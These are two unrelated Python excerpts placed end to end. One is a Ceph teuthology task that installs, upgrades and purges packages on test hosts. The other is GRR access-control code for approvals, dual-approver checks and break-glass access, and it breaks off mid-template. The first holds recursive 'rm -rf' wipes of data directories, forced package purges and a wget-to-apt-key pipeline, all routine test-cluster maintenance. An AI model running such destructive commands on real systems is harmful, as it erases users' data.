for remote in ctx.cluster.remotes.iterkeys():
p.spawn(_purge_data, remote)
def _purge_data(remote):
"""
Purge /var/lib/ceph on remote.
:param remote: the teuthology.orchestra.remote.Remote object
"""
log.info('Purging /var/lib/ceph on %s', remote)
remote.run(args=[
'sudo',
'rm', '-rf', '--one-file-system', '--', '/var/lib/ceph',
run.Raw('||'),
'true',
run.Raw(';'),
'test', '-d', '/var/lib/ceph',
run.Raw('&&'),
'sudo',
'find', '/var/lib/ceph',
'-mindepth', '1',
'-maxdepth', '2',
'-type', 'd',
'-exec', 'umount', '{}', ';',
run.Raw(';'),
'sudo',
'rm', '-rf', '--one-file-system', '--', '/var/lib/ceph',
])
def install_packages(ctx, pkgs, config):
"""
Installs packages on each remote in ctx.
:param ctx: the argparse.Namespace object
:param pkgs: list of packages names to install
:param config: the config dict
"""
install_pkgs = {
"deb": _update_deb_package_list_and_install,
"rpm": _update_rpm_package_list_and_install,
}
with parallel() as p:
for remote in ctx.cluster.remotes.iterkeys():
system_type = teuthology.get_system_type(remote)
p.spawn(
install_pkgs[system_type],
ctx, remote, pkgs[system_type], config)
#for remote in ctx.cluster.remotes.iterkeys():
# verifies that the install worked as expected
#verify_package_version(ctx, config, remote)
def _remove_deb(ctx, config, remote, debs):
"""
Removes Debian packages from remote, rudely
TODO: be less rude (e.g. using --force-yes)
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param debs: list of packages names to install
"""
log.info("Removing packages: {pkglist} on Debian system.".format(
pkglist=", ".join(debs)))
# first ask nicely
remote.run(
args=[
'for', 'd', 'in',
] + debs + [
run.Raw(';'),
'do',
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'), 'purge',
run.Raw('$d'),
run.Raw('||'),
'true',
run.Raw(';'),
'done',
])
# mop up anything that is broken
remote.run(
args=[
'dpkg', '-l',
run.Raw('|'),
'grep', '^.HR',
run.Raw('|'),
'awk', '{print $2}',
run.Raw('|'),
'sudo',
'xargs', '--no-run-if-empty',
'dpkg', '-P', '--force-remove-reinstreq',
])
# then let apt clean up
remote.run(
args=[
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'),
'autoremove',
],
)
def _remove_rpm(ctx, config, remote, rpm):
"""
Removes RPM packages from remote
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param rpm: list of packages names to remove
"""
log.info("Removing packages: {pkglist} on rpm system.".format(
pkglist=", ".join(rpm)))
baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
dist_release = baseparms['dist_release']
remote.run(
args=[
'for', 'd', 'in',
] + rpm + [
run.Raw(';'),
'do',
'sudo', 'yum', 'remove',
run.Raw('$d'),
'-y',
run.Raw('||'),
'true',
run.Raw(';'),
'done',
])
remote.run(
args=[
'sudo', 'yum', 'clean', 'all',
])
projRelease = '%s-release-%s.%s.noarch' % (
config.get('project', 'ceph'), RELEASE, dist_release)
remote.run(args=['sudo', 'yum', 'erase', projRelease, '-y'])
remote.run(
args=[
'sudo', 'yum', 'clean', 'expire-cache',
])
def remove_packages(ctx, config, pkgs):
"""
Removes packages from each remote in ctx.
:param ctx: the argparse.Namespace object
:param config: the config dict
:param pkgs: list of packages names to remove
"""
remove_pkgs = {
"deb": _remove_deb,
"rpm": _remove_rpm,
}
with parallel() as p:
for remote in ctx.cluster.remotes.iterkeys():
system_type = teuthology.get_system_type(remote)
p.spawn(remove_pkgs[
system_type], ctx, config, remote, pkgs[system_type])
def _remove_sources_list_deb(remote, proj):
"""
Removes /etc/apt/sources.list.d/{proj}.list and then runs ``apt-get
update``.
:param remote: the teuthology.orchestra.remote.Remote object
:param proj: the project whose sources.list needs removing
"""
remote.run(
args=[
'sudo', 'rm', '/etc/apt/sources.list.d/{proj}.list'.format(
proj=proj),
run.Raw('&&'),
'sudo', 'apt-get', 'update',
],
check_status=False,
)
def _remove_sources_list_rpm(remote, proj):
"""
Removes /etc/yum.repos.d/{proj}.repo, /var/lib/{proj}, and /var/log/{proj}
:param remote: the teuthology.orchestra.remote.Remote object
:param proj: the project whose .repo needs removing
"""
remote.run(
args=['sudo', 'rm', '/etc/yum.repos.d/{proj}.repo'.format(proj=proj)],
check_status=False,
)
# FIXME
# There probably should be a way of removing these files that is
# implemented in the yum/rpm remove procedures for the ceph package.
# FIXME but why is this function doing these things?
remote.run(
args=['sudo', 'rm', '-r', '/var/lib/{proj}'.format(proj=proj)],
check_status=False,
)
remote.run(
args=['sudo', 'rm', '-r', '/var/log/{proj}'.format(proj=proj)],
check_status=False,
)
_yum_unset_check_obsoletes(remote)
def remove_sources(ctx, config):
"""
Removes repo source files from each remote in ctx.
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
remove_sources_pkgs = {
'deb': _remove_sources_list_deb,
'rpm': _remove_sources_list_rpm,
}
with parallel() as p:
project = config.get('project', 'ceph')
log.info("Removing {proj} sources lists".format(
proj=project))
for remote in ctx.cluster.remotes.iterkeys():
remove_fn = remove_sources_pkgs[remote.os.package_type]
p.spawn(remove_fn, remote, project)
with parallel() as p:
project = 'calamari'
log.info("Removing {proj} sources lists".format(
proj=project))
for remote in ctx.cluster.remotes.iterkeys():
remove_fn = remove_sources_pkgs[remote.os.package_type]
p.spawn(remove_fn, remote, project)
@contextlib.contextmanager
def install(ctx, config):
"""
The install task. Installs packages for a given project on all hosts in
ctx. May work for projects besides ceph, but may not. Patches welcomed!
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
project = config.get('project', 'ceph')
debs = PACKAGES.get(project, {}).get('deb', [])
rpm = PACKAGES.get(project, {}).get('rpm', [])
# pull any additional packages out of config
extra_pkgs = config.get('extra_packages')
log.info('extra packages: {packages}'.format(packages=extra_pkgs))
debs += extra_pkgs
rpm += extra_pkgs
# When extras is in the config we want to purposely not install ceph.
# This is typically used on jobs that use ceph-deploy to install ceph
# or when we are testing ceph-deploy directly. The packages being
# installed are needed to properly test ceph as ceph-deploy won't
# install these. 'extras' might not be the best name for this.
extras = config.get('extras')
if extras is not None:
# debs = ['ceph-test', 'ceph-test-dbg', 'ceph-fuse', 'ceph-fuse-dbg',
# 'librados2', 'librados2-dbg', 'librbd1', 'librbd1-dbg',
debs = ['ceph-test', 'ceph-fuse',
'librados2', 'librbd1',
'python-ceph']
rpm = ['ceph-fuse', 'librbd1', 'librados2', 'ceph-test', 'python-ceph']
# install lib deps (so we explicitly specify version), but do not
# uninstall them, as other packages depend on them (e.g., kvm)
# TODO: these can probably be removed as these packages are now included
# in PACKAGES. We've found that not uninstalling them each run can
# sometimes cause a baremetal machine to end up in a weird state so
# they were included in PACKAGES to ensure that nuke cleans them up.
proj_install_debs = {'ceph': [
'librados2',
# 'librados2-dbg',
'librbd1',
# 'librbd1-dbg',
]}
proj_install_rpm = {'ceph': [
'librbd1',
'librados2',
]}
install_debs = proj_install_debs.get(project, [])
install_rpm = proj_install_rpm.get(project, [])
# TODO: see previous todo comment. The install_debs and install_rpm
# part can and should be removed eventually as those packages are now
# present in PACKAGES.
install_info = {
"deb": debs + install_debs,
"rpm": rpm + install_rpm}
remove_info = {
"deb": debs,
"rpm": rpm}
install_packages(ctx, install_info, config)
try:
yield
finally:
remove_packages(ctx, config, remove_info)
remove_sources(ctx, config)
if project == 'ceph':
purge_data(ctx)
def _upgrade_deb_packages(ctx, config, remote, debs):
"""
Upgrade project's packages on remote Debian host
Before doing so, installs the project's GPG key, writes a sources.list
file, and runs ``apt-get update``.
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param debs: the Debian packages to be installed
:param branch: the branch of the project to be used
"""
# check for ceph release key
r = remote.run(
args=[
'sudo', 'apt-key', 'list', run.Raw('|'), 'grep', 'Ceph',
],
stdout=StringIO(),
check_status=False,
)
if r.stdout.getvalue().find('Ceph automated package') == -1:
# if it doesn't exist, add it
remote.run(
args=[
'wget', '-q', '-O-',
'https://ceph.com/git/?p=ceph.git;a=blob_plain;f=keys/autobuild.asc',
run.Raw('|'),
'sudo', 'apt-key', 'add', '-',
],
stdout=StringIO(),
)
# get distro name and arch
r = remote.run(
args=['lsb_release', '-sc'],
stdout=StringIO(),
)
dist = r.stdout.getvalue().strip()
r = remote.run(
args=['arch'],
stdout=StringIO(),
)
arch = r.stdout.getvalue().strip()
log.info("dist %s arch %s", dist, arch)
# branch/tag/sha1 flavor
flavor = 'basic'
sha1 = config.get('sha1')
branch = config.get('branch')
tag = config.get('tag')
uri = _get_uri(tag, branch, sha1)
base_url = 'http://{host}/{proj}-deb-{dist}-{arch}-{flavor}/{uri}'.format(
host=teuth_config.gitbuilder_host,
proj=config.get('project', 'ceph'),
dist=dist,
arch=arch,
flavor=flavor,
uri=uri,
)
log.info('Pulling from %s', base_url)
# get package version string
while True:
r = remote.run(
args=[
'wget', '-q', '-O-', base_url + '/version',
],
stdout=StringIO(),
check_status=False,
)
if r.exitstatus != 0:
if config.get('wait_for_package'):
log.info('Package not there yet, waiting...')
time.sleep(15)
continue
raise VersionNotFoundError("%s/version" % base_url)
version = r.stdout.getvalue().strip()
log.info('Package version is %s', version)
break
remote.run(
args=[
'echo', 'deb', base_url, dist, 'main',
run.Raw('|'),
'sudo', 'tee', '/etc/apt/sources.list.d/{proj}.list'.format(
proj=config.get('project', 'ceph')),
],
stdout=StringIO(),
)
remote.run(args=['sudo', 'apt-get', 'update'], check_status=False)
remote.run(
args=[
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'),
'install',
] + ['%s=%s' % (d, version) for d in debs],
)
def _upgrade_rpm_packages(ctx, config, remote, pkgs):
"""
Upgrade project's packages on remote RPM-based host
Before doing so, it makes sure the project's -release RPM is installed -
removing any previous version first.
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param pkgs: the RPM packages to be installed
:param branch: the branch of the project to be used
"""
distinfo = _get_baseurlinfo_and_dist(ctx, remote, config)
log.info(
"Host {host} is: {distro} {ver} {arch}".format(
host=remote.shortname,
distro=distinfo['distro'],
ver=distinfo['relval'],
arch=distinfo['arch'],)
)
base_url = _get_baseurl(ctx, remote, config)
log.info('Repo base URL: %s', base_url)
project = config.get('project', 'ceph')
# Remove the -release package before upgrading it
args = ['sudo', 'rpm', '-ev', '%s-release' % project]
remote.run(args=args)
# Build the new -release package path
release_rpm = "{base}/noarch/{proj}-release-{release}.{dist_release}.noarch.rpm".format(
base=base_url,
proj=project,
release=RELEASE,
dist_release=distinfo['dist_release'],
)
# Upgrade the -release package
args = ['sudo', 'rpm', '-Uv', release_rpm]
remote.run(args=args)
uri = _get_baseurlinfo_and_dist(ctx, remote, config)['uri']
_yum_fix_repo_priority(remote, project, uri)
_yum_fix_repo_host(remote, project)
_yum_set_check_obsoletes(remote)
remote.run(
args=[
'sudo', 'yum', 'clean', 'all',
])
# Actually upgrade the project packages
args = ['sudo', 'yum', '-y', 'install']
args += pkgs
remote.run(args=args)
def upgrade_old_style(ctx, node, remote, pkgs, system_type):
"""
Handle the upgrade using methods in use prior to ceph-deploy.
"""
if system_type == 'deb':
_upgrade_deb_packages(ctx, node, remote, pkgs)
elif system_type == 'rpm':
_upgrade_rpm_packages(ctx, node, remote, pkgs)
def upgrade_with_ceph_deploy(ctx, node, remote, pkgs, sys_type):
"""
Upgrade using ceph-deploy
"""
dev_table = ['branch', 'tag', 'dev']
ceph_dev_parm = ''
ceph_rel_parm = ''
for entry in node.keys():
if entry in dev_table:
ceph_dev_parm = node[entry]
if entry == 'release':
ceph_rel_parm = node[entry]
params = []
if ceph_dev_parm:
params += ['--dev', ceph_dev_parm]
if ceph_rel_parm:
params += ['--release', ceph_rel_parm]
params.append(remote.name)
subprocess.call(['ceph-deploy', 'install'] + params)
remote.run(args=['sudo', 'restart', 'ceph-all'])
def upgrade_common(ctx, config, deploy_style):
"""
Common code for upgrading
"""
assert config is None or isinstance(config, dict), \
"install.upgrade only supports a dictionary for configuration"
project = config.get('project', 'ceph')
# use 'install' overrides here, in case the upgrade target is left
# unspecified/implicit.
install_overrides = ctx.config.get(
'overrides', {}).get('install', {}).get(project, {})
log.info('project %s config %s overrides %s', project, config,
install_overrides)
# FIXME: extra_pkgs is not distro-agnostic
extra_pkgs = config.get('extra_packages', [])
log.info('extra packages: {packages}'.format(packages=extra_pkgs))
# build a normalized remote -> config dict
remotes = {}
if 'all' in config:
for remote in ctx.cluster.remotes.iterkeys():
remotes[remote] = config.get('all')
else:
for role in config.keys():
remotes_dict = ctx.cluster.only(role).remotes
if not remotes_dict:
# This is a regular config argument, not a role
continue
remote = remotes_dict.keys()[0]
if remote in remotes:
log.warn('remote %s came up twice (role %s)', remote, role)
continue
remotes[remote] = config.get(role)
for remote, node in remotes.iteritems():
if not node:
node = {}
this_overrides = copy.deepcopy(install_overrides)
if 'sha1' in node or 'tag' in node or 'branch' in node:
log.info('config contains sha1|tag|branch, removing those keys from override')
this_overrides.pop('sha1', None)
this_overrides.pop('tag', None)
this_overrides.pop('branch', None)
teuthology.deep_merge(node, this_overrides)
log.info('remote %s config %s', remote, node)
system_type = teuthology.get_system_type(remote)
assert system_type in ('deb', 'rpm')
pkgs = PACKAGES[project][system_type]
excluded_packages = config.get('exclude_packages', list())
pkgs = list(set(pkgs).difference(set(excluded_packages)))
log.info("Upgrading {proj} {system_type} packages: {pkgs}".format(
proj=project, system_type=system_type, pkgs=', '.join(pkgs)))
# FIXME: again, make extra_pkgs distro-agnostic
pkgs += extra_pkgs
node['project'] = project
deploy_style(ctx, node, remote, pkgs, system_type)
#verify_package_version(ctx, node, remote)
docstring_for_upgrade = """"
Upgrades packages for a given project.
For example::
tasks:
- install.{cmd_parameter}:
all:
branch: end
or specify specific roles::
tasks:
- install.{cmd_parameter}:
mon.a:
branch: end
osd.0:
branch: other
or rely on the overrides for the target version::
overrides:
install:
ceph:
sha1: ...
tasks:
- install.{cmd_parameter}:
all:
(HACK: the overrides will *only* apply the sha1/branch/tag if those
keys are not present in the config.)
It is also possible to attempt to exclude packages from the upgrade set:
tasks:
- install.{cmd_parameter}:
exclude_packages: ['ceph-test', 'ceph-test-dbg']
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
#
# __doc__ strings for upgrade and ceph_deploy_upgrade are set from
# the same string so that help(upgrade) and help(ceph_deploy_upgrade)
# look the same.
#
@contextlib.contextmanager
def upgrade(ctx, config):
upgrade_common(ctx, config, upgrade_old_style)
yield
upgrade.__doc__ = docstring_for_upgrade.format(cmd_parameter='upgrade')
@contextlib.contextmanager
def ceph_deploy_upgrade(ctx, config):
upgrade_common(ctx, config, upgrade_with_ceph_deploy)
yield
ceph_deploy_upgrade.__doc__ = docstring_for_upgrade.format(
cmd_parameter='ceph_deploy_upgrade')
@contextlib.contextmanager
def ship_utilities(ctx, config):
"""
Write a copy of valgrind.supp to each of the remote sites. Set executables used
by Ceph in /usr/local/bin. When finished (upon exit of the teuthology run), remove
these files.
:param ctx: Context
:param config: Configuration
"""
assert config is None
testdir = teuthology.get_testdir(ctx)
filenames = []
log.info('Shipping valgrind.supp...')
with file(os.path.join(os.path.dirname(__file__), 'valgrind.supp'), 'rb') as f:
fn = os.path.join(testdir, 'valgrind.supp')
filenames.append(fn)
for rem in ctx.cluster.remotes.iterkeys():
teuthology.sudo_write_file(
remote=rem,
path=fn,
data=f,
)
f.seek(0)
FILES = ['daemon-helper', 'adjust-ulimits']
destdir = '/usr/bin'
for filename in FILES:
log.info('Shipping %r...', filename)
src = os.path.join(os.path.dirname(__file__), filename)
dst = os.path.join(destdir, filename)
filenames.append(dst)
with file(src, 'rb') as f:
for rem in ctx.cluster.remotes.iterkeys():
teuthology.sudo_write_file(
remote=rem,
path=dst,
data=f,
)
f.seek(0)
rem.run(
args=[
'sudo',
'chmod',
'a=rx',
'--',
dst,
],
)
try:
yield
finally:
log.info('Removing shipped files: %s...', ' '.join(filenames))
run.wait(
ctx.cluster.run(
args=[
'sudo',
'rm',
'-f',
'--',
] + list(filenames),
wait=False,
),
)
@contextlib.contextmanager
def task(ctx, config):
"""
Install packages for a given project.
tasks:
- install:
project: ceph
branch: bar
- install:
project: samba
branch: foo
extra_packages: ['samba']
Overrides are project specific:
overrides:
install:
ceph:
sha1: ...
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
if config is None:
config = {}
assert isinstance(config, dict), \
"task install only supports a dictionary for configuration"
project, = config.get('project', 'ceph'),
log.debug('project %s' % project)
overrides = ctx.config.get('overrides')
if overrides:
install_overrides = overrides.get('install', {})
teuthology.deep_merge(config, install_overrides.get(project, {}))
log.debug('config %s' % config)
# Flavor tells us what gitbuilder to fetch the prebuilt software
# from. It's a combination of possible keywords, in a specific
# order, joined by dashes. It is used as a URL path name. If a
# match is not found, the teuthology run fails. This is ugly,
# and should be cleaned up at some point.
flavor = config.get('flavor', 'basic')
if config.get('path'):
# local dir precludes any other flavors
flavor = 'local'
else:
if config.get('valgrind'):
log.info(
'Using notcmalloc flavor and running some daemons under valgrind')
flavor = 'notcmalloc'
else:
if config.get('coverage'):
log.info('Recording coverage for this run.')
flavor = 'gcov'
ctx.summary['flavor'] = flavor
with contextutil.nested(
lambda: install(ctx=ctx, config=dict(
branch=config.get('branch'),
tag=config.get('tag'),
sha1=config.get('sha1'),
flavor=flavor,
extra_packages=config.get('extra_packages', []),
extras=config.get('extras', None),
wait_for_package=ctx.config.get('wait_for_package', False),
project=project,
)),
lambda: ship_utilities(ctx=ctx, config=None),
):
yield
|
|
#!/usr/bin/env python
"""AFF4 Objects to enforce ACL policies."""
import email
import urllib
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import email_alerts
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import utils
from grr.proto import flows_pb2
class Approval(aff4.AFF4Object):
"""An abstract approval request object.
This object normally lives within the namespace:
aff4:/ACL/...
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object.
"""
class SchemaCls(aff4.AFF4Object.SchemaCls):
"""The Schema for the Approval class."""
APPROVER = aff4.Attribute("aff4:approval/approver", rdfvalue.RDFString,
"An approver for the request.", "approver")
REASON = aff4.Attribute("aff4:approval/reason",
rdfvalue.RDFString,
"The reason for requesting access to this client.")
EMAIL_MSG_ID = aff4.Attribute("aff4:approval/email_msg_id",
rdfvalue.RDFString,
"The email thread message ID for this"
"approval. Storing this allows for "
"conversation threading.")
def CheckAccess(self, token):
"""Check that this approval applies to the given token.
Args:
token: User's credentials token.
Returns:
True if access is granted, raises access_control.UnauthorizedAccess
otherwise.
Raises:
access_control.UnauthorizedAccess: if access is rejected.
"""
_ = token
raise NotImplementedError()
@staticmethod
def GetApprovalForObject(object_urn, token=None, username=""):
"""Looks for approvals for an object and returns available valid tokens.
Args:
object_urn: Urn of the object we want access to.
token: The token to use to lookup the ACLs.
username: The user to get the approval for, if "" we get it from the
token.
Returns:
A token for access to the object on success, otherwise raises.
Raises:
UnauthorizedAccess: If there are no valid approvals available.
"""
if token is None:
raise access_control.UnauthorizedAccess(
"No token given, cannot authenticate.")
if not username:
username = token.username
approval_urn = aff4.ROOT_URN.Add("ACL").Add(object_urn.Path()).Add(
username)
error = "No approvals available"
fd = aff4.FACTORY.Open(approval_urn, mode="r", token=token)
for auth_request in fd.OpenChildren():
try:
reason = utils.DecodeReasonString(auth_request.urn.Basename())
except TypeError:
continue
# Check authorization using the data_store for an authoritative source.
test_token = access_control.ACLToken(username=username, reason=reason)
try:
# TODO(user): stop making assumptions about URNs
if object_urn.Split()[0] == "cron":
# Checking that we can access the cron job
flow.GRRFlow.StartFlow(flow_name="ManageCronJobFlow",
token=test_token, urn=object_urn)
elif object_urn.Split()[0] == "hunts":
# Checking that we can access the hunt
flow.GRRFlow.StartFlow(flow_name="CheckHuntAccessFlow",
token=test_token, hunt_urn=object_urn)
else:
# Check if we can access a non-existent path under this one.
aff4.FACTORY.Open(rdfvalue.RDFURN(object_urn).Add("acl_chk"),
mode="r", token=test_token)
return test_token
except access_control.UnauthorizedAccess as e:
error = e
# We tried all auth_requests, but got no usable results.
raise access_control.UnauthorizedAccess(
error, subject=object_urn)
class ApprovalWithApproversAndReason(Approval):
"""Generic all-purpose base approval class.
This object normally lives within the aff4:/ACL namespace. Reason and username
are encoded into this object's urn. Subject's urn (i.e. urn of the object
which this approval corresponds for) can also be inferred from this approval's
urn.
This class provides following functionality:
* Number of approvers configured by ACL.approvers_required configuration
parameter is required for this approval's CheckAccess() to succeed.
* Optional checked_approvers_label attribute may be specified. Then
at least min_approvers_with_label number of approvers will have to
have checked_approvers_label label in order for CheckAccess to
succeed.
* Break-glass functionality. If this approval's BREAK_GLASS attribute is
set, user's token is marked as emergency token and CheckAccess() returns
True.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows.
"""
checked_approvers_label = None
min_approvers_with_label = 1
class SchemaCls(Approval.SchemaCls):
"""The Schema for the ClientAccessApproval class."""
LIFETIME = aff4.Attribute(
"aff4:approval/lifetime", rdfvalue.RDFInteger,
"The number of microseconds an approval is valid for.",
default=4 * 7 * 24 * 60 * 60 * 1000000) # 4 weeks
BREAK_GLASS = aff4.Attribute(
"aff4:approval/breakglass", rdfvalue.RDFDatetime,
"The date when this break glass approval will expire.")
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn.
Returns:
(username, subject_urn) tuple.
"""
raise NotImplementedError()
def CheckAccess(self, token):
"""Enforce a dual approver policy for access."""
namespace, _ = self.urn.Split(2)
if namespace != "ACL":
raise access_control.UnauthorizedAccess(
"Approval object has invalid urn %s.", subject=self.urn,
requested_access=token.requested_access)
user, subject_urn = self.InferUserAndSubjectFromUrn()
if user != token.username:
raise access_control.UnauthorizedAccess(
"Approval object is not for user %s." % token.username,
subject=self.urn, requested_access=token.requested_access)
now = rdfvalue.RDFDatetime().Now()
# Is this an emergency access?
break_glass = self.Get(self.Schema.BREAK_GLASS)
if break_glass and now < break_glass:
# This tags the token as an emergency token.
token.is_emergency = True
return True
# Check that there are enough approvers.
lifetime = self.Get(self.Schema.LIFETIME)
approvers = set()
for approver in self.GetValuesForAttribute(self.Schema.APPROVER):
if approver.age + lifetime > now:
approvers.add(utils.SmartStr(approver))
if len(approvers) < config_lib.CONFIG["ACL.approvers_required"]:
raise access_control.UnauthorizedAccess(
("Requires %s approvers for access." %
config_lib.CONFIG["ACL.approvers_required"]),
subject=subject_urn,
requested_access=token.requested_access)
if self.checked_approvers_label:
approvers_with_label = []
# We need to check labels with high privilege since normal users can
# inspect other user's labels.
for approver in approvers:
try:
data_store.DB.security_manager.CheckUserLabels(
approver, [self.checked_approvers_label], token=token.SetUID())
approvers_with_label.append(approver)
except access_control.UnauthorizedAccess:
pass
if len(approvers_with_label) < self.min_approvers_with_label:
raise access_control.UnauthorizedAccess(
"At least %d approver(s) should have '%s' label." % (
self.min_approvers_with_label,
self.checked_approvers_label),
subject=subject_urn,
requested_access=token.requested_access)
return True
class ClientApproval(ApprovalWithApproversAndReason):
"""An approval request for access to a specific client.
This object normally lives within the namespace:
aff4:/ACL/client_id/user/<utils.EncodeReasonString(reason)>
Hence the client_id and user which is granted access are inferred from this
object's URN.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object:
- RequestClientApprovalFlow()
- GrantClientApprovalFlow()
- BreakGlassGrantClientApprovalFlow()
"""
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn."""
_, client_id, user, _ = self.urn.Split(4)
return (user, rdfvalue.ClientURN(client_id))
class HuntApproval(ApprovalWithApproversAndReason):
"""An approval request for running a specific hunt.
This object normally lives within the namespace:
aff4:/ACL/hunts/hunt_id/user_id/<utils.EncodeReasonString(reason)>
Hence the hunt_id and user_id are inferred from this object's URN.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object:
- RequestHuntApprovalFlow()
- GrantHuntApprovalFlow()
"""
checked_approvers_label = "admin"
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn."""
_, hunts_str, hunt_id, user, _ = self.urn.Split(5)
if hunts_str != "hunts":
raise access_control.UnauthorizedAccess(
"Approval object has invalid urn %s." % self.urn,
requested_access=self.token.requested_access)
return (user, aff4.ROOT_URN.Add("hunts").Add(hunt_id))
class CronJobApproval(ApprovalWithApproversAndReason):
"""An approval request for managing a specific cron job.
This object normally lives within the namespace:
aff4:/ACL/cron/cron_job_id/user_id/<utils.EncodeReasonString(reason)>
Hence the hunt_id and user_id are inferred from this object's URN.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object:
- RequestCronJobApprovalFlow()
- GrantCronJobApprovalFlow()
"""
checked_approvers_label = "admin"
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn."""
_, cron_str, cron_job_name, user, _ = self.urn.Split(5)
if cron_str != "cron":
raise access_control.UnauthorizedAccess(
"Approval object has invalid urn %s." % self.urn,
requested_access=self.token.requested_access)
return (user, aff4.ROOT_URN.Add("cron").Add(cron_job_name))
class RequestApprovalWithReasonFlowArgs(rdfvalue.RDFProtoStruct):
protobuf = flows_pb2.RequestApprovalWithReasonFlowArgs
class RequestApprovalWithReasonFlow(flow.GRRFlow):
"""Base flow class for flows that request approval of a certain type."""
args_type = RequestApprovalWithReasonFlowArgs
approval_type = None
def BuildApprovalUrn(self):
"""Builds approval object urn."""
raise NotImplementedError()
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
raise NotImplementedError()
@classmethod
def ApprovalUrnBuilder(cls, subject, user, reason):
"""Encode an approval URN."""
return aff4.ROOT_URN.Add("ACL").Add(
subject).Add(user).Add(utils.EncodeReasonString(reason))
@flow.StateHandler()
def Start(self):
"""Create the Approval object and notify the Approval Granter."""
approval_urn = self.BuildApprovalUrn()
subject_title = self.BuildSubjectTitle()
email_msg_id = email.utils.make_msgid()
approval_request = aff4.FACTORY.Create(approval_urn, self.approval_type,
mode="w", token=self.token)
approval_request.Set(approval_request.Schema.REASON(self.args.reason))
approval_request.Set(approval_request.Schema.EMAIL_MSG_ID(email_msg_id))
# We add ourselves as an approver as well (The requirement is that we have 2
# approvers, so the requester is automatically an approver).
approval_request.AddAttribute(
approval_request.Schema.APPROVER(self.token.username))
approval_request.Close()
# Notify to the users.
for user in self.args.approver.split(","):
user = user.strip()
fd = aff4.FACTORY.Create(aff4.ROOT_URN.Add("users").Add(user),
"GRRUser", mode="rw", token=self.token)
fd.Notify("GrantAccess", approval_urn,
"Please grant access to %s" % subject_title, self.session_id)
fd.Close()
template = u"""
<html><body><h1>Approval to access %(subject_title)s requested.</h1>
The user "%(username)s" has requested access to %(subject_title)s
for the purpose of "%(reason)s".
Please click <a href='%(admin_ui)s#%(approval_urn)s'>
here
</a> to review this request and then grant access.
<p>Thanks,</p>
<p>%(signature)s</p>
<p>%(image)s</p>
</body></html>"""
# If you feel like it, add a funny cat picture here :)
image = ""
url = urllib.urlencode((("acl", utils.SmartStr(approval_urn)),
("main", "GrantAccess")))
body = template % dict(
username=self.token.username,
reason=self.args.reason,
admin_ui=config_lib.CONFIG["AdminUI.url"],
subject_title=subject_title,
approval_urn=url,
image=image,
signature=config_lib.CONFIG["Email.signature"])
email_alerts.SendEmail(user, utils.SmartStr(self.token.username),
u"Approval for %s to access %s." % (
self.token.username, subject_title),
utils.SmartStr(body), is_html=True,
cc_addresses=config_lib.CONFIG[
"Email.approval_cc_address"],
message_id=email_msg_id)
class GrantApprovalWithReasonFlowArgs(rdfvalue.RDFProtoStruct):
protobuf = flows_pb2.GrantApprovalWithReasonFlowArgs
class GrantApprovalWithReasonFlow(flow.GRRFlow):
"""Base flows class for flows that grant approval of a certain type."""
args_type = GrantApprovalWithReasonFlowArgs
def BuildApprovalUrn(self):
"""Builds approval object urn."""
raise NotImplementedError()
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
raise NotImplementedError()
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
raise NotImplementedError()
@classmethod
def ApprovalUrnBuilder(cls, subject, user, reason):
"""Encode an approval URN."""
return RequestApprovalWithReasonFlow.ApprovalUrnBuilder(subject, user,
reason)
@flow.StateHandler()
def Start(self):
"""Create the Approval object and notify the Approval Granter."""
approval_urn = self.BuildApprovalUrn()
subject_title = self.BuildSubjectTitle()
access_urn = self.BuildAccessUrl()
# This object must already exist.
try:
approval_request = aff4.FACTORY.Open(approval_urn, mode="rw",
aff4_type=self.approval_type,
token=self.token)
except IOError:
raise access_control.UnauthorizedAccess("Approval object does not exist.",
requested_access="rw")
# We are now an approver for this request.
approval_request.AddAttribute(
approval_request.Schema.APPROVER(self.token.username))
email_msg_id = utils.SmartStr(approval_request.Get(
approval_request.Schema.EMAIL_MSG_ID))
approval_request.Close(sync=True)
# Notify to the user.
fd = aff4.FACTORY.Create(
aff4.ROOT_URN.Add("users").Add(self.args.delegate),
"GRRUser", mode="rw", token=self.token)
fd.Notify("ViewObject", self.args.subject_urn,
"%s has granted you access to %s."
% (self.token.username, subject_title), self.session_id)
fd.Close()
template = u"""
